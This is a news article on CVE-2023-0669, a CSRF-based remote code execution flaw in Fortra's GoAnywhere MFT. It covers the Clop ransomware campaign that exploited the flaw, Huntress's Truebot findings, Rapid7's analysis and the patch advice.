Last
week,
the
Cybersecurity
and
Infrastructure
Security
Agency
(CISA)
added
three
new
entries
to
its
Known
Exploited
Vulnerabilities
catalog.
Among
them
was
CVE-2023-0669,
a
bug
that
has
paved
the
way
for
exploits
and
follow-on
ransomware
attacks
against
hundreds
of
organizations
in
recent
weeks.
The
bug
was
discovered
in
GoAnywhere,
a
Windows-based
file-sharing
software
from
Fortra,
formerly
HelpSystems.
According
to
its
website,
GoAnywhere
is
used
at
more
than
3,000
organizations
to
manage
documents
of
all
kinds.
According
to
data
from
Enlyft,
most
of
those
are
large
organizations
—
with
at
least
1,000
and,
often,
more
than
10,000
employees
—
mostly
based
in
the
United
States.
The
bug
tracked
as
CVE-2023-0669
allows
hackers
to
remotely
execute
code
in
target
systems,
through
the
internet,
without
need
for
authentication.
As
of
this
writing,
this
vulnerability
has
not
yet
received
an
official
CVSS
rating
from
the
National
Vulnerability
Database.
But
we
need
not
wonder
about
how
dangerous
it
is,
as
hackers
have
already
pounced.
On
Feb.
10
—
days
after
Fortra
released
a
patch
—
the
Clop
ransomware
gang
claimed
to
have
exploited
CVE-2023-0669
in
over
130
organizations.
After
three
weeks
and
counting,
it’s
unclear
whether
or
not
more
organizations
are
still
at
risk.
Timeline
of
the
GoAnywhere
Exploit(s)
On
Feb.
2,
two
abnormal
commands
triggered
alerts
in
an
IT
environment
monitored
by
endpoint
detection
and
response
(EDR)
vendor
Huntress.
Both
were
executed
on
a
host
designated
for
processing
transactions
on
the
GoAnywhere
platform,
though
the
significance
of
this
wasn’t
clear
yet.
“At
first
glance,
the
alert
itself
was
fairly
generic,”
wrote
Joe
Slowik,
threat
intelligence
manager
for
Huntress.
“But
further
analysis
revealed
a
more
interesting
set
of
circumstances.”
An
entity
on
this
alerted
network
had
attempted
to
download
a
file
from
a
remote
resource.
Slowik
and
his
colleagues
tried
to
access
the
file
themselves,
but
by
then
the
port
used
to
download
it
had
been
closed
up.
“We
don’t
really
know
for
certain
why,”
Slowik
tells
Dark
Reading.
“It’s
possible
that
the
adversary
was
working
at
a
very
rapid
clip.”
They
did
have
the
IP
address
of
that
entity,
however,
which
traced
back
to
Bulgaria,
and
was
flagged
as
malicious
by
VirusTotal.
The
actor
seemed
to
be
from
outside
of
the
organization,
and
had
used
their
first
command
to
download
and
run
a
dynamic
link
library
(DLL)
file.
“Knowing
that
the
DLL
was
also
executed
further
raised
the
risk
level
of
the
incident,”
Slowik
says,
“since
if
it
was
malware
that
was
downloaded,
it
is
now
running
on
the
system.”
There
were
other
signs,
too,
that
this
was
a
compromise.
But
even
after
isolating
the
relevant
server,
a
second
server
at
the
targeted
organization
became
infected.
“We
were
worried
that
we
had
a
very
persistent
adversary,”
Slowik
recalls.
The
researchers
still
lacked
a
copy
of
the
downloaded
malware,
but
all
of
the
evidence
surrounding
it
seemed
to
accord
with
activity
previously
associated
with
a
malware
family
called
Truebot.
“The
post
in
the
URI
structure
that
was
used
mapped
to
earlier
Truebot
samples,”
Slowik
says.
“The
DLL
exports
that
were
referenced
in
order
to
launch
the
malware,
or
similar
to
historical
tripod
samples,
as
well
as
some
strings
and
code
structures,
all
matched.
Within
the
samples
themselves,
all
of
it
aligned
very
nicely
with
what
had
previously
been
reported
in
2022
for
Truebot.”
Truebot
has
been
linked
to
a
prolific
Russian
group
called
TA505.
Notably,
TA505
has
utilized
the
ransomware-as-a-service
(RaaS)
malware
“Clop”
in
previous
attacks.
On
the
same
day
as
Slowik’s
investigation,
reporter
Brian
Krebs
publicly
republished
an
advisory
Fortra
had
sent
to
its
users
the
day
before.
GoAnywhere
was
being
exploited,
its
developers
explained,
and
they
were
implementing
a
temporary
service
outage
in
response.
Whatever
mitigations
were
taken
weren’t
enough.
On
Feb.
10,
hackers
behind
the
Clop
ransomware
told
Bleeping
Computer
that
they’d
used
the
GoAnywhere
exploit
to
breach
over
more
than
organizations.
How
CVE-2023-0669
Works
CVE-2023-0669
is
a
cross-site
request
forgery
(CSRF)
but
that
arises
from
how
unpatched
GoAnywhere
users
install
their
software
licenses.
Interestingly,
it
was
as
much
a
design
choice
as
an
oversight.
“Typically,
installing
a
license
involves
downloading
a
license
file
from
a
server
and
uploading
it
to
your
device,”
explains
Ron
Bowes,
lead
security
researcher
for
Rapid7,
who
released
the
most
detailed
publicized
analysis
of
how
an
internal
user
could
trigger
the
exploit.
“Fortra
chose
to
make
that
whole
process
transparent,
where
the
license
is
delivered
through
the
administrator’s
browser.
That
means
the
user
gets
a
much
smoother
experience.”
However,
that
seamlessness
came
at
a
cost.
“There
is
no
CSRF
protection
(and
the
cookie
is
not
actually
required,
so
no
authentication
is
required
to
exploit
this
issue),”
Bowes
explained
in
his
analysis.
“That
means
that
this
can,
by
design,
be
exploited
via
cross-site
request
forgery.”
In
its
report,
Rapid7
labeled
the
exploitability
of
this
vulnerability
as
“very
high.”
“While
the
administration
port
should
not
be
exposed
to
the
internet,”
Bowes
says,
“it’s
very
easy
to
configure
it
that
way
by
mistake.
And
once
an
attacker
understands
the
vulnerability,
it
can
be
exploited
without
any
risk
of
crashing
the
application
or
corrupting
data.”
Rapid7
also
labeled
“very
high”
the
value
of
such
an
exploit
to
an
attacker.
As
Bowes
explains,
“due
to
the
nature
of
the
application
(managed
file
transfer,
or
MFT),
it’s
common
for
a
GoAnywhere
MFT
server
to
sit
on
a
network
perimeter
and
to
have
the
file
transfer
ports
publicly
exposed.
This
makes
it
a
good
target
for
both
pivoting
into
an
organization’s
internal
network,
and/or
stealing
potentially
sensitive
data
directly
off
the
target.”
On
Feb.
6,
Fortra
fixed
CVE-2023-0669
“by
adding
what
they
call
a
‘license
request
token,'”
Bowes
explains,
“which
is
included
in
the
encrypted
request
to
Fortra’s
server.
It
behaves
exactly
as
a
CSRF
token
would,
preventing
an
attacker
from
leveraging
an
administrator’s
browser.”
What
to
Do
Now
As
severe
as
the
exploit
is,
only
a
fraction
of
GoAnywhere
customers
are
vulnerable
to
outside
hackers
through
CVE-2023-0669.
However,
even
those
without
Internet-exposed
GoAnywhere
instances
are
still
vulnerable
to
internal
users
or
attackers
who
have
gained
initial
compromise
to
a
network
via
regular
Web
browsers.
The
bug
can
be
exploited
remotely
if
an
organization’s
GoAnywhere
administration
port
—
8000
or
8001
—
is
exposed
on
the
Internet.
As
of
last
week,
more
than
1,000
GoAnywhere
instances were
exposed,
but,
Bleeping
Computer
explained,
only
135
of
those
pertained
to
the
relevant
ports
8000
and
8001.
Most
of
those
vulnerable
seem
to
have
already
been
swept
up
in
one
big
campaign
by
the
Clop
group.
“We
urgently
advise
all
GoAnywhere
MFT
customers
to
apply
this
patch,”
Fortra
wrote
in
another
advisory
to
its
internal
customers.
“Particularly
for
customers
running
an
admin
portal
exposed
to
the
Internet,
we
consider
this
an
urgent
matter.”
About Author
